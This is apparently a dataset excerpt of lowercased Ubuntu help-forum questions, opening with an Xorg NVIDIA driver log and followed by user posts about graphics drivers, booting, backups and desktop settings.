nvidia glx module 319.32 wed jun 19 14:55:38 pdt 2013 [ 6.534 ] loading extension glx [ 6.534 ] ( ii ) loadmodule : `` nvidia '' [ 6.534 ] ( ii ) loading /usr/lib/x86_64-linux-gnu/xorg/extra-modules/nvidia_drv.so [ 6.539 ] ( ii ) module nvidia : vendor= '' nvidia corporation '' [ 6.539 ] compiled for 4.0.2 , module version = 1.0.0 [ 6.539 ] module class : x.org video driver [ 6.541 ] ( ii ) nvidia dlloader x driver 319.32 wed jun 19 14:34:12 pdt 2013 [ 6.541 ] ( ii ) nvidia unified driver for all supported nvidia gpus [ 6.541 ] ( ++ ) using vt number 7 [ 6.546 ] ( ii ) loading sub module `` fb '' [ 6.546 ] ( ii ) loadmodule : `` fb '' [ 6.547 ] ( ii ) loading /usr/lib/xorg/modules/libfb.so [ 6.547 ] ( ii ) module fb : vendor= '' x.org foundation '' [ 6.547 ] compiled for 1.14.5 , module version = 1.0.0 [ 6.547 ] abi class : x.org ansi c emulation , version 0.4 [ 6.547 ] ( ww ) unresolved symbol : fbgetgcprivatekey [ 6.547 ] ( ii ) loading sub module `` wfb '' [ 6.547 ] ( ii ) loadmodule : `` wfb '' [ 6.548 ] ( ii ) loading /usr/lib/xorg/modules/libwfb.so [ 6.548 ] ( ii ) module wfb : vendor= '' x.org foundation '' [ 6.548 ] compiled for 1.14.5 , module version = 1.0.0 [ 6.548 ] abi class : x.org ansi c emulation , version 0.4 [ 6.548 ] ( ii ) loading sub module `` shadow '' [ 6.548 ] ( ii ) loadmodule : `` shadow '' [ 6.548 ] ( ii ) loading /usr/lib/xorg/modules/libshadow.so [ 6.549 ] ( ii ) module shadow : vendor= '' x.org foundation '' [ 6.549 ] compiled for 1.14.5 , module version = 1.1.0 [ 6.549 ] abi class : x.org ansi c emulation , version 0.4 [ 6.550 ] ( ii ) loading sub module `` ramdac '' [ 6.550 ] ( ii ) loadmodule : `` ramdac '' [ 6.550 ] ( ii ) module `` ramdac '' already built-in [ 6.550 ] ( ** ) nvidia ( 0 ) : depth 24 , ( -- ) framebuffer bpp 32 [ 6.550 ] ( == ) nvidia ( 0 ) : rgb weight 888 [ 6.550 ] ( == ) nvidia ( 0 ) : default visual is truecolor [ 6.550 ] ( == ) nvidia ( 0 ) : using gamma correction ( 1.0 , 1.0 , 1.0 ) [ 6.550 ] ( ** ) nvidia ( 0 ) : option `` stereo '' `` 0 '' [ 6.550 ] ( ** ) nvidia ( 0 ) : option `` nvidiaxineramainfoorder '' `` dfp '' [ 6.550 ] ( ** ) nvidia ( 0 ) : stereo disabled by request [ 6.550 ] ( ** ) nvidia ( 0 ) : option `` metamodes '' `` crt : nvidia-auto-select +1680+0 , dfp : nvidia-auto-select +0+0 '' [ 6.550 ] ( ** ) nvidia ( 0 ) : enabling 2d acceleration [ 6.972 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung syncmaster ( crt-0 ) ) does not support nvidia [ 6.972 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 6.979 ] ( ii ) nvidia ( 0 ) : nvidia gpu geforce gtx 650 ti ( gk106 ) at pci:1:0:0 ( gpu-0 ) [ 6.979 ] ( -- ) nvidia ( 0 ) : memory : 2097152 kbytes [ 6.979 ] ( -- ) nvidia ( 0 ) : videobios : 80.06.21.00.18 [ 6.979 ] ( ii ) nvidia ( 0 ) : detected pci express link width : 16x [ 6.980 ] ( -- ) nvidia ( 0 ) : valid display device ( s ) on geforce gtx 650 ti at pci:1:0:0 [ 6.980 ] ( -- ) nvidia ( 0 ) : samsung syncmaster ( crt-0 ) ( boot , connected ) [ 6.980 ] ( -- ) nvidia ( 0 ) : dfp-0 [ 6.981 ] ( -- ) nvidia ( 0 ) : samsung syncmaster ( dfp-1 ) ( connected ) [ 6.981 ] ( -- ) nvidia ( 0 ) : samsung syncmaster ( crt-0 ) : 480.0 mhz maximum pixel clock [ 6.981 ] ( -- ) nvidia ( 0 ) : dfp-0 : 165.0 mhz maximum pixel clock [ 6.981 ] ( -- ) nvidia ( 0 ) : dfp-0 : internal single link tmds [ 6.981 ] ( -- ) nvidia ( 0 ) : samsung syncmaster ( dfp-1 ) : 330.0 mhz maximum pixel clock [ 6.981 ] ( -- ) nvidia ( 0 ) : samsung syncmaster ( dfp-1 ) : internal dual link tmds [ 6.981 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 6.981 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( crt-0 ) ( using edid frequencies [ 6.981 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 6.981 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 6.981 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( dfp-1 ) ( using edid frequencies [ 6.981 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 6.982 ] ( ii ) nvidia ( 0 ) : validated metamodes : [ 6.982 ] ( ii ) nvidia ( 0 ) : [ 6.982 ] ( ii ) nvidia ( 0 ) : `` crt : nvidia-auto-select+1680+0 , dfp : nvidia-auto-select+0+0 '' [ 6.982 ] ( ii ) nvidia ( 0 ) : virtual screen size determined to be 3360 x 1050 [ 7.003 ] ( -- ) nvidia ( 0 ) : dpi set to ( 90 , 88 ) ; computed from `` useediddpi '' x config [ 7.003 ] ( -- ) nvidia ( 0 ) : option [ 7.003 ] ( -- ) depth 24 pixmap format is 32 bpp [ 7.003 ] ( ii ) nvidia : using 3072.00 mb of virtual memory for indirect memory [ 7.003 ] ( ii ) nvidia : access . [ 7.007 ] ( ii ) nvidia ( 0 ) : setting mode `` crt : nvidia-auto-select+1680+0 , dfp : nvidia-auto-select+0+0 '' [ 7.110 ] loading extension nv-glx [ 7.165 ] ( == ) nvidia ( 0 ) : disabling shared memory pixmaps [ 7.165 ] ( == ) nvidia ( 0 ) : backing store disabled [ 7.165 ] ( == ) nvidia ( 0 ) : silken mouse enabled [ 7.165 ] ( ** ) nvidia ( 0 ) : dpms enabled [ 7.165 ] loading extension nv-control [ 7.166 ] loading extension xinerama [ 7.166 ] ( ii ) loading sub module `` dri2 '' [ 7.166 ] ( ii ) loadmodule : `` dri2 '' [ 7.166 ] ( ii ) module `` dri2 '' already built-in [ 7.166 ] ( ii ) nvidia ( 0 ) : [ dri2 ] setup complete [ 7.166 ] ( ii ) nvidia ( 0 ) : [ dri2 ] vdpau driver : nvidia [ 7.166 ] ( -- ) randr disabled [ 7.168 ] ( ii ) selinux : disabled on system [ 7.169 ] ( ii ) initializing extension glx [ 7.182 ] ( ii ) xkb : reuse xkmfile /var/lib/xkb/server-b20d7fc79c7f597315e3e501aef10e0d866e8e92.xkm [ 7.183 ] ( ii ) config/udev : adding input device power button ( /dev/input/event1 ) [ 7.183 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 7.183 ] ( ii ) loadmodule : `` evdev '' [ 7.183 ] ( ii ) loading /usr/lib/xorg/modules/input/evdev_drv.so [ 7.184 ] ( ii ) module evdev : vendor= '' x.org foundation '' [ 7.184 ] compiled for 1.14.1 , module version = 2.7.3 [ 7.184 ] module class : x.org xinput driver [ 7.184 ] abi class : x.org xinput driver , version 19.1 [ 7.184 ] ( ii ) using input driver 'evdev ' for 'power button' [ 7.184 ] ( ** ) power button : always reports core events [ 7.184 ] ( ** ) evdev : power button : device : `` /dev/input/event1 '' [ 7.184 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 7.184 ] ( -- ) evdev : power button : found keys [ 7.184 ] ( ii ) evdev : power button : configuring as keyboard [ 7.184 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/lnxpwrbn:00/input/input1/event1 '' [ 7.184 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 6 ) [ 7.184 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 7.184 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 7.184 ] ( ** ) option `` xkb_layout '' `` us '' [ 7.185 ] ( ii ) config/udev : adding input device power button ( /dev/input/event0 ) [ 7.185 ] ( ** ) power button : applying inputclass `` evdev keyboard catchall '' [ 7.185 ] ( ii ) using input driver 'evdev ' for 'power button' [ 7.185 ] ( ** ) power button : always reports core events [ 7.185 ] ( ** ) evdev : power button : device : `` /dev/input/event0 '' [ 7.185 ] ( -- ) evdev : power button : vendor 0 product 0x1 [ 7.185 ] ( -- ) evdev : power button : found keys [ 7.185 ] ( ii ) evdev : power button : configuring as keyboard [ 7.185 ] ( ** ) option `` config_info '' `` udev : /sys/devices/lnxsystm:00/device:00/pnp0c0c:00/input/input0/event0 '' [ 7.185 ] ( ii ) xinput : adding extended input device `` power button '' ( type : keyboard , id 7 ) [ 7.185 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 7.185 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 7.185 ] ( ** ) option `` xkb_layout '' `` us '' [ 7.185 ] ( ii ) config/udev : adding drm device ( /dev/dri/card0 ) [ 7.185 ] ( ii ) config/udev : ignoring already known drm device ( /dev/dri/card0 ) [ 7.185 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=9 ( /dev/input/event10 ) [ 7.185 ] ( ii ) no input driver specified , ignoring this device . [ 7.185 ] ( ii ) this device may have been added with another device file . [ 7.185 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=8 ( /dev/input/event11 ) [ 7.185 ] ( ii ) no input driver specified , ignoring this device . [ 7.185 ] ( ii ) this device may have been added with another device file . [ 7.185 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=7 ( /dev/input/event12 ) [ 7.185 ] ( ii ) no input driver specified , ignoring this device . [ 7.185 ] ( ii ) this device may have been added with another device file . [ 7.185 ] ( ii ) config/udev : adding input device hda nvidia hdmi/dp , pcm=3 ( /dev/input/event13 ) [ 7.185 ] ( ii ) no input driver specified , ignoring this device . [ 7.185 ] ( ii ) this device may have been added with another device file . [ 7.185 ] ( ii ) config/udev : adding input device logitech unifying device . wireless pid:4002 ( /dev/input/event3 ) [ 7.185 ] ( ** ) logitech unifying device . wireless pid:4002 : applying inputclass `` evdev keyboard catchall '' [ 7.185 ] ( ii ) using input driver 'evdev ' for 'logitech unifying device . wireless pid:4002' [ 7.185 ] ( ** ) logitech unifying device . wireless pid:4002 : always reports core events [ 7.185 ] ( ** ) evdev : logitech unifying device . wireless pid:4002 : device : `` /dev/input/event3 '' [ 7.185 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : vendor 0x46d product 0xc52b [ 7.185 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : found 1 mouse buttons [ 7.185 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : found scroll wheel ( s ) [ 7.185 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : found relative axes [ 7.185 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : forcing relative x/y axes to exist . [ 7.185 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : found absolute axes [ 7.185 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : forcing absolute x/y axes to exist . [ 7.186 ] ( -- ) evdev : logitech unifying device . wireless pid:4002 : found keys [ 7.186 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : configuring as mouse [ 7.186 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : configuring as keyboard [ 7.186 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : adding scrollwheel support [ 7.186 ] ( ** ) evdev : logitech unifying device . wireless pid:4002 : yaxismapping : buttons 4 and 5 [ 7.186 ] ( ** ) evdev : logitech unifying device . wireless pid:4002 : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 7.186 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1a.0/usb1/1-1/1-1.1/1-1.1:1.2/0003:046d : c52b.0003/input/input3/event3 '' [ 7.186 ] ( ii ) xinput : adding extended input device `` logitech unifying device . wireless pid:4002 '' ( type : keyboard , id 8 ) [ 7.186 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 7.186 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 7.186 ] ( ** ) option `` xkb_layout '' `` us '' [ 7.186 ] ( ii ) evdev : logitech unifying device . wireless pid:4002 : initialized for relative axes . [ 7.186 ] ( ww ) evdev : logitech unifying device . wireless pid:4002 : ignoring absolute axes . [ 7.186 ] ( ** ) logitech unifying device . wireless pid:4002 : ( accel ) keeping acceleration scheme 1 [ 7.186 ] ( ** ) logitech unifying device . wireless pid:4002 : ( accel ) acceleration profile 0 [ 7.186 ] ( ** ) logitech unifying device . wireless pid:4002 : ( accel ) acceleration factor : 2.000 [ 7.186 ] ( ** ) logitech unifying device . wireless pid:4002 : ( accel ) acceleration threshold : 4 [ 7.186 ] ( ii ) config/udev : adding input device hda intel pch front headphone ( /dev/input/event4 ) [ 7.186 ] ( ii ) no input driver specified , ignoring this device . [ 7.186 ] ( ii ) this device may have been added with another device file . [ 7.186 ] ( ii ) config/udev : adding input device hda intel pch line out ( /dev/input/event5 ) [ 7.186 ] ( ii ) no input driver specified , ignoring this device . [ 7.186 ] ( ii ) this device may have been added with another device file . [ 7.186 ] ( ii ) config/udev : adding input device hda intel pch line ( /dev/input/event6 ) [ 7.186 ] ( ii ) no input driver specified , ignoring this device . [ 7.186 ] ( ii ) this device may have been added with another device file . [ 7.186 ] ( ii ) config/udev : adding input device hda intel pch front mic ( /dev/input/event7 ) [ 7.186 ] ( ii ) no input driver specified , ignoring this device . [ 7.186 ] ( ii ) this device may have been added with another device file . [ 7.186 ] ( ii ) config/udev : adding input device hda intel pch rear mic ( /dev/input/event8 ) [ 7.186 ] ( ii ) no input driver specified , ignoring this device . [ 7.186 ] ( ii ) this device may have been added with another device file . [ 7.186 ] ( ii ) config/udev : adding input device logitech usb-ps/2 optical mouse ( /dev/input/event2 ) [ 7.186 ] ( ** ) logitech usb-ps/2 optical mouse : applying inputclass `` evdev pointer catchall '' [ 7.186 ] ( ii ) using input driver 'evdev ' for 'logitech usb-ps/2 optical mouse' [ 7.186 ] ( ** ) logitech usb-ps/2 optical mouse : always reports core events [ 7.186 ] ( ** ) evdev : logitech usb-ps/2 optical mouse : device : `` /dev/input/event2 '' [ 7.186 ] ( -- ) evdev : logitech usb-ps/2 optical mouse : vendor 0x46d product 0xc00e [ 7.186 ] ( -- ) evdev : logitech usb-ps/2 optical mouse : found 3 mouse buttons [ 7.186 ] ( -- ) evdev : logitech usb-ps/2 optical mouse : found scroll wheel ( s ) [ 7.186 ] ( -- ) evdev : logitech usb-ps/2 optical mouse : found relative axes [ 7.186 ] ( -- ) evdev : logitech usb-ps/2 optical mouse : found x and y relative axes [ 7.186 ] ( ii ) evdev : logitech usb-ps/2 optical mouse : configuring as mouse [ 7.186 ] ( ii ) evdev : logitech usb-ps/2 optical mouse : adding scrollwheel support [ 7.187 ] ( ** ) evdev : logitech usb-ps/2 optical mouse : yaxismapping : buttons 4 and 5 [ 7.187 ] ( ** ) evdev : logitech usb-ps/2 optical mouse : emulatewheelbutton : 4 , emulatewheelinertia : 10 , emulatewheeltimeout : 200 [ 7.187 ] ( ** ) option `` config_info '' `` udev : /sys/devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.1/2-1.1:1.0/input/input2/event2 '' [ 7.187 ] ( ii ) xinput : adding extended input device `` logitech usb-ps/2 optical mouse '' ( type : mouse , id 9 ) [ 7.187 ] ( ii ) evdev : logitech usb-ps/2 optical mouse : initialized for relative axes . [ 7.187 ] ( ** ) logitech usb-ps/2 optical mouse : ( accel ) keeping acceleration scheme 1 [ 7.187 ] ( ** ) logitech usb-ps/2 optical mouse : ( accel ) acceleration profile 0 [ 7.187 ] ( ** ) logitech usb-ps/2 optical mouse : ( accel ) acceleration factor : 2.000 [ 7.187 ] ( ** ) logitech usb-ps/2 optical mouse : ( accel ) acceleration threshold : 4 [ 7.187 ] ( ii ) config/udev : adding input device logitech usb-ps/2 optical mouse ( /dev/input/mouse0 ) [ 7.187 ] ( ii ) no input driver specified , ignoring this device . [ 7.187 ] ( ii ) this device may have been added with another device file . [ 7.187 ] ( ii ) config/udev : adding input device eee pc wmi hotkeys ( /dev/input/event9 ) [ 7.187 ] ( ** ) eee pc wmi hotkeys : applying inputclass `` evdev keyboard catchall '' [ 7.187 ] ( ii ) using input driver 'evdev ' for 'eee pc wmi hotkeys' [ 7.187 ] ( ** ) eee pc wmi hotkeys : always reports core events [ 7.187 ] ( ** ) evdev : eee pc wmi hotkeys : device : `` /dev/input/event9 '' [ 7.187 ] ( -- ) evdev : eee pc wmi hotkeys : vendor 0 product 0 [ 7.187 ] ( -- ) evdev : eee pc wmi hotkeys : found keys [ 7.187 ] ( ii ) evdev : eee pc wmi hotkeys : configuring as keyboard [ 7.187 ] ( ** ) option `` config_info '' `` udev : /sys/devices/platform/eeepc-wmi/input/input9/event9 '' [ 7.187 ] ( ii ) xinput : adding extended input device `` eee pc wmi hotkeys '' ( type : keyboard , id 10 ) [ 7.187 ] ( ** ) option `` xkb_rules '' `` evdev '' [ 7.187 ] ( ** ) option `` xkb_model '' `` pc105 '' [ 7.187 ] ( ** ) option `` xkb_layout '' `` us '' [ 7.423 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung syncmaster ( crt-0 ) ) does not support nvidia [ 7.423 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 7.423 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 7.423 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( crt-0 ) ( using edid frequencies [ 7.423 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 7.429 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 7.429 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( dfp-1 ) ( using edid frequencies [ 7.429 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 7.739 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 7.764 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +1680+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 7.818 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung syncmaster ( crt-0 ) ) does not support nvidia [ 7.818 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 7.818 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 7.818 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( crt-0 ) ( using edid frequencies [ 7.818 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 7.824 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 7.824 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( dfp-1 ) ( using edid frequencies [ 7.824 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 31.488 ] ( ii ) nvidia ( gpu-0 ) : display ( samsung syncmaster ( crt-0 ) ) does not support nvidia [ 31.488 ] ( ii ) nvidia ( gpu-0 ) : 3d vision stereo . [ 31.488 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 31.488 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( crt-0 ) ( using edid frequencies [ 31.488 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 31.497 ] ( ** ) nvidia ( 0 ) : using horizsync/vertrefresh ranges from the edid for display [ 31.497 ] ( ** ) nvidia ( 0 ) : device samsung syncmaster ( dfp-1 ) ( using edid frequencies [ 31.497 ] ( ** ) nvidia ( 0 ) : has been enabled on all display devices . ) [ 31.507 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +1680+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +1680+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } '' [ 31.555 ] ( ii ) nvidia ( 0 ) : setting mode `` dvi-i-0 : nvidia-auto-select @ 1680x1050 +1680+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } , dvi-d-0 : nvidia-auto-select @ 1680x1050 +0+0 { viewportin=1680x1050 , viewportout=1680x1050+0+0 } ''
421740	how to install video driver for laptop lenovo 20157 in ubuntu 13.10	i have a laptop of lenovo g580 model no 20157 recently i installed ubuntu 13.10 , i am not able to increase or decrease the screen brightness . what can be done ?
421741	how do i start city scope ?	ubuntu 12.04 , unity scope packagers/ppa installed . calculator works . city scope looks like it 's installed but does not function . type in a city and get the sorry nothing found found message . how do i start the city scope ?
421742	performance tweak ubuntu 13.10	i have a ubuntu 13.10 system.just trying to go through the system i found few tweaks and settings that will be helpful for overall performance.like installing sudo apt-get install preload . in the startup of login screen i have gnome ( no effect ) gnome flashback and ubuntu default which one is better in performance ? is it gnome flashback or gnome shell ( not installed ) . in startup application its showing my display driver ( nvdia xorg 319 proprietary tested ) which i use.can i remove that from startup and expect that to work in ubuntu .
421747	vlc media player subtitles persistence after after jump	when watching videos in foreign language with `` soft '' subtitles , i often do forward/backward jumps to re-read some of the text . the fact that after jump the subtitles that would be there if normally played do n't show up automatically is quite disturbing as i have to do short jumps again to find the moment when needed phrase appears . does anyone know how to make vlc show the exact subtitle which would be normally shown at the time i jump to ?
421752	how to disable monitor sleep/blanking ?	ubuntu server system ( no x installed ) that runs several networking daemons . it 's been headless for years but i recently attached a monitor to it and installed some cli monitoring utilities ( glances and pysensors ) as this server is also my nas gateway . been on this horrific easter-egg hunt searching for how-to disable the screen-blanking / powersaver mode for the terminal . i 'm hesitant to remove acpi as a package because of unknown/future interdependencies . somewhere , there 's some obscure config setting that will prevent the monitor from blanking . i 've disabled the sleep option in the monitor 's firmware - and , of course a key-press on the kb will awaken the screen ... but not sleeping at all is optimal . thanks ...
421753	are pending desktop apps ever going to be accepted ?	it says on the review status page of my app : '' thank you for submitting a gratis free software application through myapps . at this time we are unable to process this request , as we are working on the implementation of a new app upload process . to get your software out to millions of ubuntu users in the meantime , you can either use a personal package archive to distribute your app for free , or you can define a price to charge for your app . '' this whole thing seems to be sooo confusing right now . i have a ppa , but i want my app to be added to usc . it seems that there 's now a beta version of the new process . is it only for mobile apps with click packages ? should i delete my entry and resubmit it ?
421754	installed ubuntu on netbook but unity is too heavy , would i benefit from installing mir ?	i 'm running on an atom netbook with 2gb ram . but the machines runs a lot cooler under win7 than under ubuntu . my first thought was because of unity putting to much load on the machine . after searching high and low yesterday , i came across mir , apparently that 's the next thing for ubuntu . would i benefit by installing it ? how would i install it ? i know it 's still in development , but would i be fine with a machine that 's only used for school aka internet , mail & word processing ?
421755	sound popup showing every minute in xubuntu	i have the sound popup thingy displayed about every minute , even without changing any volume settings , or clicking/pressing anything . it 's happening in xubuntu 13.10 and looks like this how can i fix it ?
421757	problems with booting ubuntu after formatting boot partition	i am a new ubuntu user and after accidentally formatting the boot partition i ca n't get it back to work . here is some more info : i was trying to format an sd card from the terminal and i accidentally may have formatted the partition which boots ubuntu . now my computer goes directly to the bios settings and does n't load the operating system . under boot tab in the bios there is : launch pxe oprom [ disabled ] boot option priorities boot option # 1 [ ubuntu ( drive not ... . ] boot option # 2 [ ubuntu ( drive not ... . ] boot option # 3 [ windows boot manag ... . ] ( i had removed windows long time ago . ) this is how i tried to solve the problem so far : i created an ubuntu boot usb drive and was able to start the machine from the usb ( luckily all the data was still there ) . i then tried installing ubuntu again alongside the old ubuntu . the installation completed successfully but the machine still wo n't boot without a usb drive . i then followed the instructions in the thread for createbootpartitionafterinstall i tried running boot-repair but kept getting an error for a missing flag `` bios_grub '' . so in gparted i changed the flag for my /dev/sda1 to bios_grub ( it was `` boot '' before that - not sure if this was a right thing to do but could n't run boot-repair without it ) . here is what my partitions look like : http : //eagle1.american.edu/~gp9804a/ubuntu_gparted.png i ran boot-repair successfully but still to no avail - machine still wont ' boot without the usb drive . i then tried the advanced options in boot-repair and under the grub location tab i checked `` seperate /boot partition sda1 '' this also apparently went well and i received a successful boot-repair message at the end . the only problem there was that it could n't run some updates on dev/sda6 and it instructed me to enable updates on the partition ( which i have no idea how to do and thought that this was tangential to the main problem anyway ) . however , after restart i was back to the same problem - going straight to bios and still no boot . the url from ( the last ) boot-repair is this : http : //paste.ubuntu.com/6939109/ i am now at a loss on what to do and how to get my machine back up . any suggestions are greatly appreciated
421758	everytime after updating system , i have to reinstall nvidia driver to get my unity work properly	every time after updating system , i have to reinstall nvidia driver to get my unity work properly . every time i update my system , after restarting top panel and side bar goes missing and graphics acceleration gets disabled , and to fix this i have to reinstall the nvidia driver . its annoying . my pc details ram = 4gb architecture : x86_64 intel ( r ) core ( tm ) 2 quad cpu q9300 @ 2.50ghz nvidia corporation gf119 [ geforce gt 610 ] ( rev a1 ) graphics driver 331.38 ( downloaded manually from nvidia website ) linux 3.11.0-15-generic ubuntu 13.10 saucy xorg version 1.14.5
421759	exclude hidden directories from subvolume/snapshot	i am using snapshots for backing up data of my @ home subvolume . but i would like to backup the real important data ( like all my files , which are in @ home , but not hidden directories because i am not interested in backing up .cache and other stuff which changes often , because this would lead to much waste of space in my incremental backup solution . could i somehow achieve it , that my real data are a subvolume in home without creating a directory in home which contains all data and is a own subvolume , or is this impossible by design ? my backup method is similar to : https : //btrfs.wiki.kernel.org/index.php/incremental_backup
421761	having some trouble with my nvidia driver on kubuntu 13.10	i wanted to try out linux again so i downloaded 13.10 . i installed on my laptop which is a dell xps with two types of video cards , integrated intel and a nvidia gtx555m . the way this laptop runs in win 7 seems pretty straight forward . i install drivers for both cards . the intel card runs for most normal tasks , websurfing etc , but when i fire up a game or connect a 2nd monitor via hdmi then the nvidia card takes over and does the heavy lifting . my problem is that in ubuntu the intel drivers appear to be working normally but i cant seem to get the nvidia drivers to work/take over . when i launch additional drivers i see nvidia_331 as activated but not in use . in an effort to test the drivers i connected a 2nd monitor via hdmi but cant get the system to recognize it . frankly i dont even know if this is a valid test or trigger to get the 555m to take over or not . i would like to get this to work before i spend more time getting wine and play on linux installed only for them to fail because of video issues if possible . my ultimate goal here is to be able to play civilization v ( steam install ) and watch videos on netflix while browsing reddit ! i would appreciate any thoughts or advice you folks have ! thanks !
421767	why do my steam games not accelerate ?	i just installed ubuntu 12.04 lts alongside windows 7 on my old toshiba satellite l505d-gs6000 . from what i remember , this computer performed pretty fairly on the same game ( garry 's mod ) in windows . i installed steam , then installed garry 's mod , and started up . the menu was fine , but then when the map started , it lagged so much i had to hard reset the computer . how can i increase the amd graphical acceleration to a tolerable level ? is it possible ?
421771	how to create new project within xampp ?	i was wondering how you can create a new folder so when i type localhost/folder , it will read the files within the folder . i do n't know where to find the folder to put it .
421777	is it possible to restore the original quality of a youtube video after downloading it ?	i 'm on xubuntu . two days ago , i wanted to download a mp3 song from youtube : this one using this firefox extension or any other . the size is 82 mb . it 's clearly not an mp3 file ; it 's a video that has an .mp3 extension . all the video data are still there . so i wonder , do all downloaders work the same ? for example , could i download this video using this extension , in the lowest possible quality to save bandwidth , and then convert it to hd using ffmpeg or whatever ? i do n't think that downloaders are capable of converting videos ; they just change the extension of the file to reduce its size a bit . am i wrong ?
421781	installing ubuntu alongside windows 8.1 using windows 8 boot manager	i 'm having trouble with the installation of ubuntu alongside windows 8.1 . first of all , after completing the installation process , my pc just boots into windows straight away . i fixed this issue by reinstalling grub 2 from a boot repair disk provided in the ubuntu website . i could then see grub and boot into ubuntu . however , i wish to use windows 8 boot manager to choose which operating system to boot into . i followed some tutorials and used easybcd to reinstall the mbr and add a ubuntu entry to the boot options . no luck : it does n't work . it just boots into windows 8.1 straight away again . it is probably worth mentioning that my pc did not originally come with windows 8 . i performed a clean install of windows 8.1 on an older pc , so it does not have a uefi bios . how can i install ubuntu alongside windows 8.1 using windows 8 boot manager ?
421782	unable to install ubuntu 13.10 on `` gigabyte ga-990fxa-ud3 rev 4.0 ''	i am not able to install ubuntu 13.10 on gigabyte ga-990fxa-ud3 rev 4.0 . the motherboard has n't got a built-in video card . the video card is r9-280x . the ubuntu starts loading the files , but a second before the ubuntu installer should start being displayed a black screen appears . i have read a lot about this , and it seems that the ubuntu is not able to recognize the video card . some people have fixed this issue by enabling some bios options , but the same thing does nothing for me . is there some way to fix this ? why is ubuntu not recognizing my video card ?
421785	ca n't type accents in greek layout - right alt does n't act as altgr	/etc/default/keyboard : xkbmodel= '' pc105 '' xkblayout= '' us '' xkbvariant= '' '' xkboptions= '' '' in the keyboard system settings gui advanced options , i 've tried checking `` right alt '' for neither , both , and either 3rd and 5th level .
421786	unable to authenticate for software update unless sudo	i do n't seem to be able to update software if i open the update-manager using the menu . it will ask for the password to authenticate so i type my password as i would if it was on command line for sudo . but this always causes it to say that authentication failed . 'your authentication attempt was unsuccessful . please try again. ' . i can log in using the default log in manager and i can authenticate if i run 'sudo update-manager ' so it looks like it is something to do with how the auth happens ... have i misunderstood about this and i need to give root user a separate password ? matching 'defaults ' entries for me on this host : env_reset , mail_badpass , secure_path=/usr/local/sbin\ : /usr/local/bin\ : /usr/sbin\ : /usr/bin\ : /sbin\ : /bin user me may run the following commands on this host : ( all : all ) all
